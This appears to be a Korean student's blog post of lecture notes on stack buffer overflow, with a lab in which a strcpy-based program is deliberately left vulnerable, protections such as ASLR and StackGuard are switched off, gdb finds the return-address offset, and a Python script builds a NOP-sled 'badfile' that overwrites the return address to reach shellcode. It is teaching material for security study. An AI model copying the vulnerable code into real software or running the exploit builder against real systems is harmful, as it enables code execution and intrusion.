Buffer Overflow Attacks(1)

Eunji·2025년 11월 3일

System Security

목록 보기

10/16

Virtual address vs. physical address

32-bit OS는 각 프로세스마다 4GB의 가상 메모리 공간이 할당되고, OS는 실제 물리 메모리와 매핑하는 정보를 테이블로 관리한다.
.exe 파일은 windows에서 사용하는 실행 파일 형식

Program memory stack

malloc()은 void 타입으로 메모리의 시작 주소를 반환하는데, 어떤 타입의 포인터로도 변환될 수 있다.
malloc()을 원하는 자료형의 포인터로 변환하여, 포인터 연산이나 역참조 시 올바른 자료형 크기로 메모리를 읽고 쓸 수 있도록 한다.

x; 전역변수 초기화 $\rightarrow$ Data segment
a, b, ptr; 지역변수 $\rightarrow$ Stack
- ptr; int *형 포인터 변수
y; static 지역변수 $\rightarrow$ BSS segment
- 프로그램 시작 시, 한 번만 공간 할당되고 값 유지
malloc(); $\rightarrow$ Heap
- ptr이 가리키는 영역은 malloc()을 통해 동적 할당

'ptr' 변수 자체는 stack 영역에 저장된 int형 포인터 변수이고, 이 포인터가 가리키는 실제 메모리 공간은 heap 영역에 할당된 공간이다.

int *ptr;
int **pptr = &ptr;
- ptr이라는 포인터 변수의 주소를 담는 포인터, 포인터 변수를 가리키는 또 하나의 포인터

Order of the function arguments in stack

x86 32bit C 라이브러리 호출 규약에서는, 오른쪽 인수부터 스택에 push한다. 함수가 호출된 뒤, ebp가 기준점이 되고, ebp+8 위치에 첫 번째 인수, ebp+12 위치에 두 번째 인수를 저장한다. ebp를 기준으로 양수는 인자, 음수는 지역 변수라는 규칙을 갖는다.

Function call stack

main()에서 f(1,2)를 호출하면 새로운 함수(f)의 스택 프레임이 생성된다.
스택 프레임의 시작 위치를 함수의 파라미터부터로 볼 수도 있고, EBP(Value of x)부터로 볼 수도 있다. 이 그림에서는 함수 파라미터(인자)가 저장되는 영역을 프레임의 시작으로 간주하고 있음을 알 수 있다.
int x;에서 call f() 명령어가 실행되는 순간, return address를 push하고 함수의 prologue를 실행한다.

Stack layout for function call chain

bar가 ret하면 자기 프레임이 pop되고, 저장돼 있던 return address로 돌아가면서 바로 아래에 있던 foo 프레임이 되고, 다시 foo가 끝나면 같은 방식으로 main으로 돌아간다.

Copy data to buffer

명시하지 않아도 컴파일러가 문자열 끝에 자동으로 NULL byte('\0)를 삽입
strcpy 함수는 NULL 문자를 만나면 복사를 종료

Buffer overflow

12 byte 버퍼를 지역 변수로 선언
main()에서 선언한 문자열의 길이가 12 byte를 초과하여, 버퍼 뒤에 위치한 다른 메모리 영역이 덮어써지면서 Seg fault 발생

What can we do?

Buffer overflow 실제로 문제를 일으키는 시점은 문자열이 버퍼에 덮어써질 때가 아니라, 함수가 반환되면서 'POP EIP' 명령을 실행할 때이다. 이때 스택에서 올바르지 않은 복귀 주소(RET Address)를 가져와서 프로그램이 잘못된 명령어로 실행하기 때문이다.

How to run malicious code

함수 호출 메커니즘을 보면, 'POP EIP' 명령은 RET Address를 스택에서 꺼내어 EIP에 저장한다. 공격자는 RET Address를 malicious code로 변경하여, 프로그램이 해당 주소로 점프하도록 만들어 쉘을 획득할 수 있다.

Consequences of buffer overflow

Overwriting return address with some random address can point to:
- Invalid instruction
- Non-existing address
- Access violation
- Attacker's code
  - Malicious code to gain access

Experiment setup

최신 Ubuntu에서는 '/bin/sh'가 보통 'dash'로 심볼릭 링크되어 있다. 'dash'는 사용자 injection이 제한적이기 때문에 'zsh'을 이용하여 실습을 진행한다.

1. Turn off countermeasure: memory randomization

NX, StackGuard, PIE 같은 보호를 끈다.

2. Compilation

3. Execution

Linux의 랜덤 생성 장치인 '/dev/urandom'에서 앞부분 100 byte를 읽어 'badfile' 생성
현재 buffer 크기가 100 byte이므로 정상적으로 처리된다.
그러나 160 byte로 덮어쓰게 되면 버퍼 크기 100 byte를 초과하여 인접 메모리가 덮어써지고, 이로 인해 Seg fault가 발생한다.

Vulnerable Program

int main(int argc, char **argv)
{
    char str[400];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 300, badfile);
    foo(str);

    printf("Returned Properly\n");
    return 1; 
    
}

Reding 300 bytes of data from badfile
Storing the file contents into a str variable of size 400 bytes
Calling foo function with str as an argument

badfile is created by the user and hence the contents are in control the user

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int foo(char *str)
{
    char buffer[100];

    strcpy(buffer, str);

    return 1;
}

공격자가 'str'에 긴 문자열을 넣으면 이 반환 주소 값을 공격자가 임의로 조작할 수 있고, 이로 인해 프로그램 흐름이 변경되어 악성코드를 실행시킬 수 있다.

Creation of the malicious input (badfile)

Task A: Offset distance between the base of the buffer and return address
Task B: Address to place the shellcode

공격자가 반환 주소를 조작하기 위해 정확한 offset을 알아야 하며, shellcode가 메모리 어디에 위치하는지도 정확히 알아야 쉘을 획득할 수 있다.

Task A: Distance between buffer base address and return address

gdb를 사용하여 스택 동작 방식을 분석하려면, 컴파일 시 '-g' 옵션을 추가하여 디버깅 심볼을 포함시킨다.

$ 3 = 108; 즉, EBP와 Buffer의 시작점의 차이는 108 byte
Buffer의 크기는 100 byte로 지정되었지만, 실제로 메모리에서는 108 byte 차지하다는 것을 알 수 있다.
공격자는 Buffer의 시작점부터 RET까지의 거리가 필요하다. (injection시 RET 덮어써야 하기 때문)
따라서, 108 + 4(EBP 건너뛰기) = 112가 distance가 된다.

gdb 문법
- p: 변수나 표현식을 출력하는 명령어
- p/d: 'p'에 10진수 출력 형식을 지정하는 옵션
- $: 레지스터를 지칭할 때 사용하는 접두사

Task B: Address of malicious code

Investigation using gdb
Malicious code(shellcode) is written in the badfile which is passed as an argument to the vulnerable function
Using gdb, we can find the address of the function argument

#include <stdio.h>
void func(int* a1)
{
    printf(" :: a1's address is 0x%x \n", (unsigned int) &a1);
}

int main()
{
    int x = 3; 
    func(&x);
    return 1;
}

ASLR이 기본적으로 켜져 있어서 실행할 때마다 프로세스의 메모리 주소가 달라진다. 실습에서는 주소가 바뀌지 않게 하기 위해 randomize 옵션을 off한다.

To increase the chances of jumping to the correct address, of the malicious code, we can fill the badfile with NOP instrunctions and place the malicious code at the end of the buffer.
- NOP-Instruction that dose nothing

The structure of badfile

badfile의 내용은 공격자가 설계한 대로 프로그램의 buffer부터 RT까지 메모리 전체를 덮어쓰는 binary 구조이다.

RT에 기록할 값, 주소의 마지막 바이트가 0x00이면 copy 함수가 문자열의 끝으로 인식하여 입력이 중간에 끊길 수 있으므로 0x00으로 끝나지 않도록 주의해야 한다.
배열의 마지막에는 shellcode를 위치시켜 악의적 코드 실행한다.

Badfile construction

# Fill the content with NOPs 
content = bytearray(0x90 for i in range(300))

# Put the shellcode at the end 
start = 300 - len(shellcode)
content[start:] = shellcode

# Put the address at offset 112 
ret = 0xffffd348 + 112 # shellcode의 대략적 위치 
content[112:116] = (ret).to_bytes(4, byteorder='little')

# Write the content to a file 
with open('badfile', 'wb') as f:
    f.write(content)

전체 배열의 길이가 300이므로 shellcode가 빠진 남은 공간(276)과 return address offset(220)이 비슷하다.
oxffffd348 + 112(Not be ended in 0) $\rightarrow$ start address of shellcode, or address of a NOP from the start of buffer[], offset = 108 + 112 = 220

Eunji

이전 포스트

Shellcode

다음 포스트